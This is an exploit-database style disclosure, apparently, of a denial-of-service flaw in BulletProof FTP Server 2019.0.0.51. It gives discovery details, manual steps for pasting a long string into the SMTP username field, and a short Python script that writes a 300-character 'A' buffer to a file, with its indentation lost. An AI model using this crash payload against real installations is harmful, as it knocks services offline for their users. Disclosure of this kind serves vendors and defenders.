BulletProof FTP Server version 2019.0.0.51 suffers from a denial of service vulnerability.
#Exploit Title: BulletProof FTP Server 2019.0.0.51 - Denial of Service
#Discovery by: Yehia Elghaly - Mrvar0x
#Discovery Date: 2023-03-31
#Vendor Homepage: https://barcodemagic.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.51
#Tested on: Windows 7 x86
#Steps To Crash:
#Run: BulletProof_FTP_Server_2019.0.0.51.py
#Open poc.txt and copy content to clipboard
#Open BulletProof FTP Server - Select "Settings" > "SMTP"
#"Email Server" select "Username" and Paste Clipboard
#Click on "Test" -----> Crashed
buffer = "A" * 300
payload = buffer
try:
f=open("Poc.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
